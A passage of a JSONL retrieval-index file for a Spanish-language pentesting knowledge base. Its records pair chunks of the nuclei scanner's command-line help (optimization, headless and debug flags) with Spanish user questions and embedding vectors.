(eg. host:80,host:443)\n -mhe, -max-host-error int max errors for a host before skipping from scan (default 30)\n -te, -track-error string[] adds given error to max-host-error watchlist (standard, file)\n -nmhe, -no-mhe disable skipping host from scan based on errors\n -project use a project folder to avoid sending same request multiple times\n -project-path string set a specific project path (default \"/tmp\")\n -spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)\n -stream stream mode - start elaborating without sorting the input\n -ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto)\n -irt, -input-read-timeout value timeout on input read (default 3m0s)\n -nh, -no-httpx disable httpx probing for non-url input\n -no-stdin disable stdin processing", "indexar": "cual es una herramienta que pueda escanear hosts y dejar puertos predeterminados sin timeout cortante", "v": [0.05622, -0.01803, -0.16328, -0.03014, 0.09245, -0.1036, 0.13381, -0.02607, -0.07226, -0.03193, -0.18342, 0.05974, 0.04766, -0.00938, -0.01874, -0.00367, 0.12287, 0.07325, 0.09286, 0.03285, -0.03661, -0.04272, 0.04195, -0.03883, -0.04915, -0.04301, 0.02744, 0.08489, -0.25431, 0.04887, -0.06712, 0.07278, 0.10482, -0.06, 0.09057, -0.12477, -0.05316, 0.09352, 0.07834, 0.0749, 0.03978, 0.03185, -0.03298, -0.01439, 0.02708, -0.04275, -0.14822, 0.11361, 0.03029, 0.01026, -0.05098, -0.03236, -0.04302, 0.03518, -0.0007, -0.09346, 0.24042, -0.04793, 0.00397, -0.1069, -0.08528, 0.04209, 0.03469, -0.09007, 0.08554, -0.00077, -0.0183, -0.02135, -0.06174, 0.04118, -0.06485, 0.00294, 0.11768, -0.09181, 0.0161, -0.08438, -0.07322, 0.11224, 0.05984, 0.08666, 0.05777, -0.06107, -0.05111, 0.01411, -0.06518, -0.09295, -0.02657, -0.07125, -0.00394, -0.14835, 0.03704, -0.00456, 0.06461, 0.09967, -0.04306, -0.05382, 0.12178, 0.04219, -0.00877, -0.07435, 0.12138, 0.04002, -0.12116, 0.12182, 0.07228, 0.03912, 0.05576, -0.02001, -0.03354, 0.05238, 0.0746, 0.07868, 0.01577, -0.10985, -0.019, 0.01061, -0.04382, -0.11372, 0.02203, -0.0333, 0.03855, -0.06956, -0.03454, -0.05179, 0.03711, 0.02357, -0.00974, 0.03168, 0.09157, -0.02214, -0.02903, -0.03031, -0.07596, -0.07259, -0.07253, -0.0598, 0.03305, -0.10804, 0.00862, -0.09264, -0.04781, 0.05132, -0.06414, -0.01004, 0.08146, 0.01711, -0.03612, -0.04603, -0.04751, -0.07679, 0.00714, 0.04083, -0.04665, -0.00287, -0.09678, 0.01842, 0.03291, 0.00847, -0.05718, 0.07445, -0.04602, -0.03783, 0.02032, -0.02071, 0.04266, -0.10269, -0.01334, 0.03082, 0.03765, 0.01513, 0.03883, 0.05287, -0.01807, -0.0384, 0.0019, -0.0125, -0.0772, -0.04441, -0.02631, -0.02475, -0.0134, 0.04282, -0.04767, -0.07188, -0.04414, -0.08454, -0.02435, -0.0425, -0.03137, 0.05318, 0.03652, 0.04417, -0.02298, -0.04744, -0.03409, 0.03085, 0.00671, 0.00886, 0.08102, 0.01129, 0.00022, 0.01773, 0.02939, -0.01803, 0.04648, 0.05056, -0.06096, -0.00552, 0.02105, 0.04764, 0.00268, 0.01121, 0.03797, 0.01112, 0.00807, 0.01869, -0.01206, -0.00893, -0.00851, 0.03326, -0.02567, 0.0496, 0.05248, 0.02607, -0.04839, 0.05561, 0.11439, 0.07239, 0.02194, -0.00658, -0.0132, -0.017, -0.02954, 0.00456, 0.06467, -0.05715, 0.02639, -0.05599, -0.00185, -0.01411, 0.04291, 0.02009, 0.02927, -0.02325, -0.01965, -0.05531, -0.03864, -0.00116, -0.04331, -0.05283, -0.01107, 0.04207, 0.01878, -0.09086, 0.06397, -0.01955]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "OPTIMIZATIONS:\n -timeout int time to wait in seconds before timeout (default 10)\n -retries int number of times to retry a failed request (default 1)\n -ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443)\n -mhe, -max-host-error int max errors for a host before skipping from scan (default 30)\n -te, -track-error string[] adds given error to max-host-error watchlist (standard, file)\n -nmhe, -no-mhe disable skipping host from scan based on errors\n -project use a project folder to avoid sending same request multiple times\n -project-path string set a specific project path (default \"/tmp\")\n -spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)\n -stream stream mode - start elaborating without sorting the input\n -ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto)\n -irt, -input-read-timeout value timeout on input read (default 3m0s)\n -nh, -no-httpx disable httpx probing for non-url input\n -no-stdin disable stdin processing", "indexar": "con que puedo ejecutar un scan con estrategia de spray personalizada y controlar los errores por host", "v": [0.03936, 0.1221, -0.21935, -0.24253, -0.03222, -0.09122, -0.0394, -0.00118, 0.02592, -0.05717, -0.11823, 0.0103, -0.00837, -0.13959, 0.04873, 0.02377, 0.07193, 0.08184, 0.00801, 0.01488, -0.01, -0.0777, 0.04103, -0.04558, -0.02344, 0.08809, -0.04244, 0.04294, -0.20094, -0.08959, -0.10267, 0.05245, 0.11997, -0.00749, -0.03103, 0.02808, -0.03812, 0.05922, 0.08324, 0.17543, -0.08673, 0.02109, -0.09059, -0.01147, 0.15054, 0.05084, -0.01714, 0.01188, 0.01344, 0.04938, -0.06408, 0.01444, -0.10497, 0.00093, -0.02105, 0.00316, -0.02246, -0.08766, -0.01491, -0.14327, -0.02007, -0.05794, 0.05428, 0.06772, -0.00557, 0.06547, -0.08248, -0.01905, -0.11457, 0.05017, 0.05467, -0.02738, 0.0545, 0.05662, 0.01561, -0.03172, -0.0172, 0.04315, -0.01658, -0.00055, -0.0057, -0.12931, -0.13651, 0.03224, -0.01444, -0.05529, -0.15291, -0.02147, -0.0104, -0.02365, 0.04608, -0.17532, -0.03339, -0.01013, -0.05615, -0.04486, 0.16119, -0.07368, -0.01677, 0.0704, 0.0938, -0.15078, -0.16186, 0.18278, 0.06591, 0.03415, -0.0049, 0.0349, -0.04337, -0.05205, -0.10023, 0.02566, -0.03772, -0.04589, 0.03021, -0.03446, -0.03813, 0.04484, 0.01864, -0.02105, -0.1509, -0.11787, -0.01172, 0.03872, 0.06631, -0.01084, -0.02882, 0.04081, -0.04139, -0.00354, -0.00077, 0.03806, -0.00164, 0.02259, 0.02038, 0.08468, -0.00681, -0.05599, -0.06184, 0.03637, -0.06139, 0.03333, 0.01689, 0.02272, 0.08213, -0.05653, 0.03536, -0.10138, -0.03666, 0.04777, 0.03728, 0.00501, 0.06526, 0.03533, -0.03751, -0.07685, 0.01163, -0.06832, 0.04176, 0.07253, -0.0132, -0.02799, -0.02998, 0.09211, 0.06626, -0.0143, -0.04926, -0.00018, -0.00999, 0.05391, -0.0602, 0.0496, 0.00701, -0.04326, -0.00817, -0.02769, 0.00601, -0.0444, 0.04683, -0.04727, 0.00556, -0.0327, 0.00514, 0.04316, 0.08879, -0.02869, 0.04851, 0.03704, 0.07179, 0.01372, -0.02651, 0.01691, 0.00136, -0.02693, 0.03101, 0.01532, 0.03878, 0.06598, -0.02261, -0.00353, 0.00015, 0.02293, 0.05978, -0.02055, 0.01283, 0.01335, 0.00492, 0.06375, 0.00408, 0.05803, 0.02273, -0.04585, 0.04022, -0.04261, -0.11149, 0.02606, 0.00159, -0.0173, 0.00265, 0.00077, 0.02917, 0.00051, 0.05665, -0.0233, -0.02752, -0.02572, 0.01406, -0.01985, 0.0183, 0.0059, -0.02751, 0.04734, -0.02921, 0.0273, 0.04771, -0.02097, 0.08121, -0.03152, -0.05655, -0.05259, -0.00062, 0.02886, 0.02065, -0.04002, -0.01739, -0.04499, -0.06463, -0.02246, -0.03492, -0.05682, 0.01177, -0.00839, 0.05923, -0.01936, -0.0041, -0.02398]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "HEADLESS:\n -headless enable templates that require headless browser support (root user on Linux will disable sandbox)\n -page-timeout int seconds to wait for each page in headless mode (default 20)\n -sb, -show-browser show the browser on the screen when running templates with headless mode\n -ho, -headless-options string[] start headless chrome with additional options\n -sc, -system-chrome use local installed Chrome browser instead of nuclei installed\n -lha, -list-headless-action list available headless actions", "indexar": "con quΓ© puedo ejecutar plantillas sin mostrar el navegador en pantalla?", "v": [0.10959, 0.04889, -0.19133, -0.17192, 0.02699, -0.06444, 0.11432, -0.07419, 0.04767, -0.11595, 0.05147, 0.08114, 0.03668, -0.04419, -0.02853, 0.06085, 0.08274, -0.10451, 0.08508, -0.03123, -0.07668, -0.11133, -0.09627, -0.05108, -0.03363, 0.01819, -0.05831, 0.10978, -0.06996, -0.15998, -0.10681, 0.00874, 0.06963, -0.04955, 0.01088, 0.04283, -0.00229, 0.02579, -0.0802, -0.05215, -0.03622, 0.09918, -0.07244, 0.03794, -0.05107, 0.00457, 0.06499, -0.02475, -0.03893, -0.08051, -0.03819, 0.07057, -0.11497, 0.02256, 0.01065, -0.04124, 0.25304, -0.11286, 0.14772, -0.08317, 0.02168, 0.02631, 0.06727, 0.06979, -0.00529, -0.02559, -0.0208, 0.06058, 0.0261, 0.01164, -0.03798, 0.00569, -0.01175, 0.00791, 0.03255, 0.0723, -0.11334, -0.0163, 0.05435, 0.12244, 0.05729, -0.06074, -0.13138, -0.03421, -0.11295, -0.04787, -0.11395, -0.00633, -0.01252, -0.13307, 0.17343, 0.07734, -0.08986, 0.00482, -0.06854, -0.05378, 0.10041, -0.00216, 0.00563, -0.01871, -0.00899, -0.02725, -0.05979, 0.05035, 0.05263, 0.08186, 0.02294, -0.10453, -0.02371, -0.03657, 0.04997, -0.04493, -0.10665, -0.07182, -0.03812, 0.0424, -0.01209, -0.03391, -0.07794, -0.06801, -0.06591, -0.00922, -0.06998, -0.05307, 0.07061, 0.03186, 0.01639, 0.06848, -0.10932, 0.01197, -0.01153, -0.0984, -0.01869, -0.00364, -0.08178, 0.04152, 0.00393, -0.04127, 0.03513, -0.095, 0.05976, 0.02129, 0.04038, 0.00891, 0.09124, -0.03889, -0.0177, -0.02949, -0.14225, -0.01033, 0.0782, -0.01323, 0.07516, 0.07853, -0.02475, -0.03259, 0.00719, 0.01059, 0.04576, 0.08002, 0.02092, -0.00862, -0.05221, 0.08697, 0.0163, 7e-05, -0.08964, 0.00764, 0.08956, 0.06546, 0.07661, 0.09281, 0.02939, -0.09472, 0.02541, -0.02199, -0.01786, 0.02357, -0.00174, 0.01701, 0.02139, 0.02513, -0.00893, -0.01521, -0.06521, -0.07444, -0.04302, -0.01771, -0.04634, 0.05053, -0.00426, 0.09799, -0.00218, -0.01339, 0.09261, 0.00302, -0.03692, -0.00644, -0.03194, -0.01493, 0.0066, -0.04212, 0.02103, -0.00988, 0.08209, 0.0556, -0.04371, 0.07192, -0.0106, 0.06607, 0.00967, -0.0109, 0.07009, -0.02214, -0.02663, -0.01081, 0.03155, -0.00246, -0.0005, 0.04204, 0.03947, -0.00529, 0.05628, -0.05277, 0.04167, 0.0228, 0.04376, 0.00604, -0.07109, -0.01167, -0.03154, 0.01438, -0.02236, 0.02197, 0.00789, 0.00746, -0.00748, -0.046, -0.04127, 0.0068, -0.02275, 0.03224, 0.00638, -0.0305, 0.01006, -0.04616, -0.06616, -0.03174, 0.04695, -0.0727, -0.05883, 0.06395, 0.0454, -0.0324, -0.0153, 0.02056]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "HEADLESS:\n -headless enable templates that require headless browser support (root user on Linux will disable sandbox)\n -page-timeout int seconds to wait for each page in headless mode (default 20)\n -sb, -show-browser show the browser on the screen when running templates with headless mode\n -ho, -headless-options string[] start headless chrome with additional options\n -sc, -system-chrome use local installed Chrome browser instead of nuclei installed\n -lha, -list-headless-action list available headless actions", "indexar": "quΓ© opciΓ³n me permite usar un navegador Chrome local en lugar del instalado por defecto?", "v": [0.02235, 0.11985, -0.23891, -0.0879, -0.03221, -0.06495, 0.06117, 0.0322, -0.01799, -0.20247, -0.12734, -0.04382, -0.12497, -0.11096, 0.00506, -0.03712, 0.08029, -0.06796, 0.00925, -0.00473, -0.11548, -0.12813, -0.04042, 0.02552, -0.02049, 0.01941, -0.06763, -0.06779, -0.10792, -0.10613, -0.01081, -0.0233, 0.09191, 0.03321, -0.04563, -0.10392, 0.07157, -0.11473, -0.0064, 0.02651, 0.09725, -0.07359, -0.07836, 0.14358, -0.02317, 0.05539, -0.0481, -0.10235, -0.03417, -0.0674, -0.03542, 0.01211, -0.17245, 0.01832, -0.02168, 0.07278, 0.14288, -0.06671, 0.05614, -0.08036, -0.05199, 0.02392, -0.03106, 0.10908, 0.03642, 0.00785, -0.09025, 0.05916, -0.04926, 0.03993, -0.00502, -0.02558, 0.03213, 0.06146, 0.01304, 0.1298, -0.00801, 0.04086, 0.158, -0.03539, 0.14096, 0.00877, -0.04765, -0.01401, -0.09502, -0.09329, 0.07753, -0.00714, 0.03296, -0.02664, 0.11717, 0.04603, 0.06531, 0.02009, -0.0251, -0.17239, 0.05236, 0.02025, 0.06435, 0.01244, 0.07871, -0.0285, 0.02921, 0.12826, 0.05477, -0.03988, 0.02051, -0.07647, -0.01496, -0.05051, 0.04516, 0.02753, -0.0574, -0.0231, -0.01332, 0.01306, 0.02481, -0.05088, -0.05407, -0.06536, -0.09686, -0.02781, -0.08036, -0.0359, 0.0088, 0.02994, 0.00055, 0.05144, -0.02053, 0.06649, 0.02099, -0.12004, 0.01471, -0.05573, -0.06966, 0.07185, 0.03209, -0.06538, -0.00138, 0.01154, 0.06109, -0.02332, -0.01707, 0.02785, 0.05643, -0.02042, -0.04572, 0.02608, -0.09143, -0.03775, 0.01423, -0.02207, -0.02412, 0.01395, -0.08388, 0.07002, -0.02165, -0.03357, 0.02812, 0.05124, -0.06674, -0.05093, 0.05056, 0.12421, -0.02561, -0.0886, -0.08818, 0.01805, 0.11696, 0.02916, 0.00715, 0.11346, -0.02927, -0.09489, 0.01936, -0.06409, 0.00615, 0.01316, -0.00361, 0.04258, -0.0191, 0.01188, -0.01437, 0.02015, -0.05871, -0.02738, -0.01747, -0.03573, -0.0672, -0.00305, -0.05617, 0.01076, -0.03892, 0.03969, 0.0241, -0.00349, -0.04453, -0.07763, 0.01449, -0.00686, -0.08685, 0.02834, -0.03608, -0.05738, 0.05021, 0.04094, -0.02506, -0.00397, -0.02853, 0.03102, 0.01706, -0.03612, 0.05803, 0.03228, 0.0192, 0.00975, 0.05245, -0.03953, -0.02171, -0.00327, 0.02895, -0.06096, 0.03125, -0.03662, 0.01201, -0.01442, 0.04971, -0.02069, -0.01795, 0.063, 0.01971, 0.01987, -0.07811, -0.0609, 0.05488, -0.01753, 0.01647, 0.00917, -0.02473, -0.05236, -0.01113, 0.09244, -0.00988, -0.05415, -0.03646, -0.05763, -0.09198, 0.05389, 0.00485, -0.05764, -0.0565, 0.02458, 0.05555, -0.07166, -0.01056, 0.06709]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "HEADLESS:\n -headless enable templates that require headless browser support (root user on Linux will disable sandbox)\n -page-timeout int seconds to wait for each page in headless mode (default 20)\n -sb, -show-browser show the browser on the screen when running templates with headless mode\n -ho, -headless-options string[] start headless chrome with additional options\n -sc, -system-chrome use local installed Chrome browser instead of nuclei installed\n -lha, -list-headless-action list available headless actions", "indexar": "cΓ³mo puedo esperar un tiempo especΓ­fico para cada pΓ‘gina al correr la herramienta en modo sin interfaz?", "v": [-0.08267, 0.2328, -0.10892, -0.19431, -0.02111, -0.15615, -0.09064, 0.00158, -0.01252, -0.02592, -0.06906, -0.07216, -0.025, -0.03213, 0.08308, 0.03261, 0.09117, 0.01866, -0.01021, -0.0535, -0.04601, -0.06267, -0.13176, -0.06849, -0.09197, -0.02876, 0.07636, 0.02134, -0.20496, -0.07147, -0.08173, 0.10369, 0.18957, -0.00596, -0.09115, -0.07115, 0.04443, 0.08627, -0.00918, -0.05644, -0.04102, 0.06177, -0.04639, 0.06814, 0.17376, 0.01512, -0.039, 0.05585, 0.00423, 0.00731, 0.04937, -0.06233, -0.00679, -0.01176, -0.10994, -0.0679, 0.27307, -0.08446, 0.03339, -0.11532, -0.0012, 0.06408, -0.08389, 0.03627, 0.0284, -0.0394, -0.06377, -0.00851, -0.03651, -0.01145, -0.06435, -0.02368, -0.09265, -0.02566, 0.04623, -0.03188, 0.03328, 0.05498, 0.08436, -0.00075, 0.03008, -0.01229, -0.06667, 0.04255, -0.07521, -0.07671, 0.03478, 0.0132, 0.07907, -0.08058, 0.0168, 0.03809, 0.0034, -0.07133, -0.06056, -0.05121, 0.0533, 0.05224, -0.00538, 0.00631, 0.02799, 0.00383, -0.12081, 0.05151, -0.06206, -0.03562, 0.03682, -0.028, -0.00538, -0.03103, 0.04149, -0.00841, -0.04942, -0.07279, 0.03337, 0.06173, 0.01344, -0.00822, -0.08237, -0.08265, -0.04708, -0.01579, -0.1613, -0.05845, 0.00913, -0.0345, -0.00076, 0.00353, 0.0309, -0.02915, -0.02993, -0.03349, -0.09004, -0.06555, -0.02621, 0.07703, -0.08438, 0.03434, 0.0365, -0.04356, 0.05886, -0.06764, -0.00351, -0.06562, -0.01974, 0.02574, 0.00337, -0.07785, -0.13056, -0.01081, 0.05748, -0.07771, 0.01963, 0.01526, -0.08221, -0.04992, 0.0231, -1e-05, -0.05909, -0.01221, -0.0802, 0.01513, -0.01998, -0.0656, -0.00563, -0.057, -0.02182, 0.01998, 0.04939, 0.05419, 0.05103, 0.07252, 0.05096, -0.05858, -0.00024, -0.02362, -0.03415, 0.02505, 0.01011, -0.03072, -0.0071, 0.02277, 0.02422, -0.04614, -0.05032, -0.13919, -0.00627, -0.0056, -0.03889, 0.04363, 0.04285, 0.06709, 0.03728, -0.04578, 0.02771, 0.00114, -0.01411, -0.01929, 0.00193, -0.0201, -0.11075, -0.0547, 0.06176, -0.03127, 0.03893, 0.07267, 0.00659, 0.03284, -0.01687, 0.04716, 0.07402, -0.02042, 0.03715, 0.00637, -0.00915, -0.01983, 0.09649, -0.03798, -0.01937, -0.07631, 0.06344, 0.06858, 0.02301, 0.04049, 0.00641, -0.02533, 0.06722, 0.03105, 0.01609, 0.00396, -0.0575, -0.02838, -0.03113, -0.01131, 0.0326, 0.00025, 0.03474, -0.00853, -0.05747, -0.00801, -0.01425, 0.06264, -0.00302, 0.0053, -0.08422, 0.00627, -0.07388, -0.04942, -0.07362, -0.09918, -0.03633, -0.03207, 0.05915, -0.00109, 0.04624, -0.0139]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "DEBUG:\n -debug show all requests and responses\n -dreq, -debug-req show all sent requests\n -dresp, -debug-resp show all received responses\n -p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)\n -pi, -proxy-internal proxy all internal requests\n -ldf, -list-dsl-function list all supported DSL function signatures\n -tlog, -trace-log string file to write sent requests trace log\n -elog, -error-log string file to write sent requests error log\n -version show nuclei version\n -hm, -hang-monitor enable nuclei hang monitoring\n -v, -verbose show verbose output\n -profile-mem string generate memory (heap) profile & trace files\n -vv display templates loaded for scan\n -svd, -show-var-dump show variables dump for debugging\n -vdl, -var-dump-limit int limit the number of characters displayed in var dump (default 255)\n -ep, -enable-pprof enable pprof debugging server\n -tv, -templates-version shows the version of the installed nuclei-templates\n -hc, -health-check run diagnostic check up", "indexar": "que herramienta sirve para mostrar todos los pedidos y respuestas de una aplicaciΓ³n?", "v": [0.0635, 0.19267, -0.1452, -0.20817, 0.11448, -0.15387, -0.06263, -0.07355, 0.04252, -0.02912, -0.04287, -0.129, 0.01889, -0.09584, 0.0381, -0.0295, 0.09776, -0.061, 0.03014, 0.06182, 0.0524, 0.03058, -0.21344, -0.07758, -0.19185, 0.11994, 0.11657, -0.07361, -0.14965, 0.02894, -0.02104, -0.07194, -0.03106, -0.05158, -0.10533, -0.09055, -0.02184, 0.01004, -0.102, 0.07717, -0.03087, 0.00888, -0.05448, 0.0115, -0.06257, 0.05685, 0.01062, 0.04868, -0.08561, 0.09262, -0.0667, -0.17325, -0.10263, 0.05593, -0.06854, -0.12295, 0.18163, -0.17567, 0.06739, -0.08296, -0.10454, -0.05949, 0.01253, -0.04779, 0.09055, -0.07337, 0.04119, 0.06758, -0.0103, 0.03177, -0.1425, 0.05055, -0.01775, -0.00344, 0.01288, 0.05349, -0.06051, 0.01895, -0.01623, 0.04498, 0.03817, -0.01359, -0.09707, -0.0061, -0.05072, -0.03584, 0.07111, -0.0415, 0.0052, -0.08178, -0.02208, 0.09356, -0.01948, 0.00545, 0.0646, -0.03517, 0.02615, -0.00904, 0.05688, 0.03557, 0.12866, -0.15254, -0.03951, -0.04961, -0.06323, 0.01118, 0.04395, -0.11521, -0.10088, 0.04196, 0.04963, -0.08138, -0.01949, 0.03937, -0.00666, 0.03638, -0.07068, -0.05642, -0.00373, 0.01556, -0.01836, 0.05405, -0.02214, -0.03009, 0.07576, -0.02679, -0.00081, 0.04667, -0.03074, 0.01577, 0.01752, -0.05806, -0.09705, 0.04323, -0.00389, -0.04133, 0.02976, -0.04925, 0.02224, -0.01849, 0.0179, 0.05212, -0.02378, -0.0971, 0.02422, 0.002, 0.01225, -0.03066, -0.03984, 0.02374, 0.05801, -0.06342, 0.01753, 0.03635, -0.05589, 0.00835, -0.02831, -0.04321, -0.02626, 0.03012, -0.0413, -0.03761, 0.02311, -0.00666, -0.02176, -0.10429, -7e-05, 0.01499, 0.06239, 0.05471, 0.03643, 0.06237, 0.01782, -0.0665, -0.00203, -0.02831, -0.01769, 0.00523, -0.00565, -0.05093, -0.03956, 0.0007, 0.01409, 0.00984, 0.05719, -0.09199, 0.03583, -0.01635, -0.00723, 0.03488, 0.02109, 0.02987, 0.00875, -0.02279, 0.01124, 0.04719, 0.01548, -0.03032, 0.00035, -0.03751, -0.05672, -0.04177, -0.04362, -0.03978, -0.0107, 0.09699, -0.00385, 0.04258, -0.00615, 0.03112, 0.00534, 0.04626, 0.06369, 0.04748, 0.0175, -0.06877, 0.02896, 0.0736, -0.03443, 0.0195, 0.00282, -0.00159, 0.00063, -0.00725, 0.01346, 0.07929, 0.05043, -0.02923, -0.02213, 0.00475, 0.02705, -0.03412, -0.02731, -0.0166, 0.01984, -0.0492, 0.02456, -0.02531, -0.04856, -0.06059, -0.03084, 0.04617, 0.01538, 0.02049, -0.04117, -0.03974, 0.01696, -0.01375, -0.02536, -0.07324, -0.04502, 0.01982, 0.06572, 0.00192, 0.0387, 0.00584]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "DEBUG:\n -debug show all requests and responses\n -dreq, -debug-req show all sent requests\n -dresp, -debug-resp show all received responses\n -p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)\n -pi, -proxy-internal proxy all internal requests\n -ldf, -list-dsl-function list all supported DSL function signatures\n -tlog, -trace-log string file to write sent requests trace log\n -elog, -error-log string file to write sent requests error log\n -version show nuclei version\n -hm, -hang-monitor enable nuclei hang monitoring\n -v, -verbose show verbose output\n -profile-mem string generate memory (heap) profile & trace files\n -vv display templates loaded for scan\n -svd, -show-var-dump show variables dump for debugging\n -vdl, -var-dump-limit int limit the number of characters displayed in var dump (default 255)\n -ep, -enable-pprof enable pprof debugging server\n -tv, -templates-version shows the version of the installed nuclei-templates\n -hc, -health-check run diagnostic check up", "indexar": "con que puedo listar las funciones disponibles del DSL o la sintaxis utilizada?", "v": [0.00822, 0.05845, -0.17663, -0.0141, 0.00512, -0.16794, -0.10287, -0.06337, -0.07792, 0.16837, -0.03219, -0.17686, -0.0776, -0.15834, 0.10726, -0.06922, 0.01365, -0.1173, -0.10265, -0.14165, -0.03216, -0.06988, -0.10555, -0.10843, 0.04536, 0.01154, 0.06087, -0.17794, -0.07625, 0.07552, 0.01629, -0.07715, 0.00841, -0.07638, 0.0521, 0.01569, -0.1772, 0.06717, 0.12868, 0.03815, 0.04675, 0.09697, -0.05364, -0.04996, -0.05564, 0.03218, -0.05753, -0.08137, 0.01924, -0.07762, -0.06772, -0.02257, -0.05971, 0.02137, 0.04064, -0.15783, 0.08214, -0.14415, 0.01324, -0.08448, 0.06625, -0.00024, -0.05877, -0.0036, -0.01018, -0.10951, -0.04877, -0.06729, -0.0579, 0.00229, -0.01814, 0.11931, -0.1024, -0.02233, 0.0981, 0.01397, 0.01052, -0.00321, 0.07801, 0.07381, -0.02457, -0.00674, -0.1083, 0.02146, -0.06763, -0.10584, 0.01847, -0.14183, -0.00218, -0.14686, 0.17147, 0.10065, 0.00475, 0.02482, 0.00778, -0.05753, 0.00966, 0.03699, -0.03135, -0.01582, 0.14164, 0.07552, -0.04006, 0.15435, 0.00459, -0.01717, 0.0784, 0.00074, -0.01637, -0.08581, 0.0003, -0.02342, -0.03898, -0.05379, -0.04115, -0.03624, -0.05022, -0.01016, -0.09286, -0.05402, 0.01109, -0.01643, 0.05725, -0.02942, 0.07284, -0.00262, 0.05355, 0.07466, -0.04266, 0.0073, 0.03722, 0.00503, -0.06449, -0.06311, -0.08383, 0.01565, 0.07276, -0.00515, -0.02738, -0.05458, 0.02343, 0.06343, 0.02079, 0.01539, 0.03374, 0.00321, -0.00323, -0.00114, -0.05814, -0.04722, -0.03904, -0.00663, 0.02485, 0.02888, -0.00739, -0.01419, -0.01193, -0.00939, -0.08434, 0.01048, -0.03525, -0.06054, 0.03466, 0.00586, 0.0771, -0.01812, -0.04697, -0.02078, 0.01368, 0.06809, -0.00312, -0.01688, 0.03139, -0.05919, -0.08489, -0.05691, -0.01925, 0.01809, 0.10687, -0.03307, -0.01064, -0.04829, -0.09435, -0.02277, -0.04972, -0.01307, -0.02733, -0.03239, 0.01688, -0.01624, -0.007, 0.00451, -7e-05, -0.00393, 0.02102, -0.05599, -0.05119, 0.00666, 0.02238, -0.05262, -0.04592, -0.08161, -0.00364, -0.04497, 0.04457, -0.00228, -0.02788, 0.0732, -0.04363, 0.00953, 0.01312, -0.02517, 0.06706, -0.02987, -0.03159, -0.04373, 0.0593, -0.04549, 0.00434, 0.00114, -0.07915, 0.05887, 0.04775, -0.0129, 0.01297, 0.01379, 0.03775, -0.02818, 0.04285, 0.00611, -0.04209, 0.04155, -0.01489, -0.05863, 0.017, 0.0085, -0.02438, -0.02169, -0.00315, -0.01559, -0.00167, 0.08506, -0.03786, -0.01599, -0.00033, -0.03618, -0.05032, 0.03279, 0.03614, -0.03437, 0.0336, 0.0466, 0.03651, -0.02927, 0.02794, -5e-05]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "DEBUG:\n -debug show all requests and responses\n -dreq, -debug-req show all sent requests\n -dresp, -debug-resp show all received responses\n -p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)\n -pi, -proxy-internal proxy all internal requests\n -ldf, -list-dsl-function list all supported DSL function signatures\n -tlog, -trace-log string file to write sent requests trace log\n -elog, -error-log string file to write sent requests error log\n -version show nuclei version\n -hm, -hang-monitor enable nuclei hang monitoring\n -v, -verbose show verbose output\n -profile-mem string generate memory (heap) profile & trace files\n -vv display templates loaded for scan\n -svd, -show-var-dump show variables dump for debugging\n -vdl, -var-dump-limit int limit the number of characters displayed in var dump (default 255)\n -ep, -enable-pprof enable pprof debugging server\n -tv, -templates-version shows the version of the installed nuclei-templates\n -hc, -health-check run diagnostic check up", "indexar": "cual es una alternativa a nuclei para generar perfiles de memoria y depuraciΓ³n?", "v": [0.08718, -0.01061, -0.00591, -0.05778, 0.10063, -0.03769, 0.02254, -0.01766, -0.17054, -0.15748, 0.04912, 0.01347, 0.00842, -0.009, -0.01693, -0.09524, 0.0248, -0.0714, 0.0641, 0.00702, -0.08374, -0.05829, -0.0589, 0.04874, -0.14327, -0.01609, 0.02266, 0.02065, 0.00727, -0.00244, 0.03005, -0.06138, 0.12768, -0.1752, 0.00429, 0.05441, 0.05546, 0.07741, -0.03102, -0.0229, -0.06596, 0.05662, -0.09643, 0.11045, 0.04896, -0.07135, -0.09326, -0.0389, 0.04933, -0.09677, -0.0007, 0.06107, -0.0742, 0.06121, 0.03109, -0.01374, 0.09004, -0.06736, 0.04147, -0.06358, -0.06987, 0.04881, 7e-05, -0.00305, 0.06594, -0.05482, -0.06063, 0.01877, -0.16528, 0.08104, -0.06788, 0.09049, 0.00142, -0.0915, 0.02439, 0.12923, 0.03466, 0.00453, -0.00344, 0.16655, -0.02273, -0.1194, -0.00514, 0.06352, -0.11954, 0.00798, 0.05333, -0.00064, -0.04376, -0.01024, 0.00597, 0.02411, 0.05146, 0.22712, -0.00705, -0.00877, 0.04975, 0.11165, 0.02352, 0.10928, 0.06867, -0.0884, -0.05308, 0.16422, 0.08123, 0.00621, -0.09152, -0.03135, -0.01419, 0.00355, 0.02311, -0.03115, -0.01712, 0.04684, -0.0217, -0.01245, 0.05189, -0.00545, 0.0627, -0.06182, -0.00089, 0.01812, 0.01446, -0.073, -0.09066, 0.02622, -0.06915, -0.00317, 0.00338, 0.08763, -0.00442, 0.07563, -0.03951, -0.18968, -0.09526, 0.00085, 0.06639, 